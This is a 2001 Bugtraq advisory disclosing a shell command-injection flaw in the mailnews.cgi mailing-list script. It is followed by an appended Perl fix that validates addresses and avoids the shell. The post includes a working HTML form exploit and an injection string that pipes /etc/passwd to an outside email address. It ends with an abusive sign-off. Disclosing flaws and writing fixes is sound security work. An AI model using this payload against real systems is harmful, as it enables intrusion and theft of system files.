Bugtraq mailing list archives
CGI - mailnews.cgi vulnerability...
From: Kanedaaa Bohater <kaneda () AC PL>
Date: Sun, 18 Feb 2001 22:04:54 +0000
Hello BuGReaders...

##Script: mailnews.cgi

##Introduction:
<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
</cat>

##Tested Version: 1.1, 1.3

The author doesn't parse some characters and he uses a very stupid "password protection". We can add or delete users from the mailing list without knowing the admin password. But this is a small problem ;] . Let's see what more we can do.

<cat source>
open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
</cat>

where $mailprog [default] is sendmail and $member is a user from the usersfile. Now we can do something like this: add user "; cat /etc/passwd | mail adam () malysz pl' and use the subroutine to execute this code :]

Simple exploit in html:

<HTML>
<BODY>
<FORM ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
<INPUT type=hidden NAME="action" value="subscribe">
<BR>
User to add with ; [ex:" ; cat /etc/passwd |mail adam () malysz pl" without quotes of course ]<INPUT NAME="address" TYPE="TEXT">
<INPUT TYPE="SUBMIT" VALUE="Submit">
</FORM>
<BR>
<A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news"> Execute command :] </A>
<CENTER> Peace... </CENTER>
</BODY>
</HTML>

Who : Kanedaaa kaneda () ac pl

***$$$### " And maybe very many will not understand these words... But there is no mercy for SONS OF BITCHES .... " ###$$*

kaneda () ac pl
Bohater ... Szef ... Abuser ... Cucumber Team Member... Bzz..
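
Archive note, added example (not part of the original post and not mailnews.cgi's own code): the quoted open() hands "$mailprog $member" to /bin/sh, so anything stored in the subscriber file is parsed as shell syntax. The sketch below shows the usual fix, validating the address and using Perl's list-form pipe open so no shell is involved. The sendmail path, the sub names and the sample entries are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example: hardened replacement for
#   open (MAIL, "|$mailprog $member")
# Names and paths here are assumptions, not taken from mailnews.cgi.
use strict;
use warnings;

my $mailprog = '/usr/sbin/sendmail';    # assumed location

# Accept only a conservative address shape: no whitespace, quotes or
# shell metacharacters, no embedded newline (\z, not $), and no leading
# '-' that the mailer could read as an option.
sub valid_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9][A-Za-z0-9._+-]*\@[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/
        ? 1 : 0;
}

# List-form open: Perl execs $mailprog directly with an argument vector,
# so $member is never interpreted by a shell. '--' ends option parsing.
sub send_news {
    my ($member, $body) = @_;
    die "rejected address\n" unless valid_address($member);
    open(my $mail, '|-', $mailprog, '-oi', '--', $member)
        or die "Can't run $mailprog: $!\n";
    print {$mail} "To: $member\nSubject: News\n\n$body\n";
    close($mail) or die "$mailprog exited with status $?\n";
}

# Constructed subscriber-file entries; only the validator is exercised,
# so this runs without a mailer installed.
my @entries = (
    'alice@example.org',
    'bob@example.org; id',                     # shell metacharacter
    '-x@example.org',                          # would look like an option
    "eve\@example.org\nBcc: x\@example.org",   # embedded newline
);
for my $entry (@entries) {
    (my $shown = $entry) =~ s/\n/\\n/g;
    printf "%-40s %s\n", $shown, valid_address($entry) ? 'accept' : 'reject';
}
```

Validation should run both when an address is subscribed and again when the subscriber file is read back, since entries written before the fix may already be in the file.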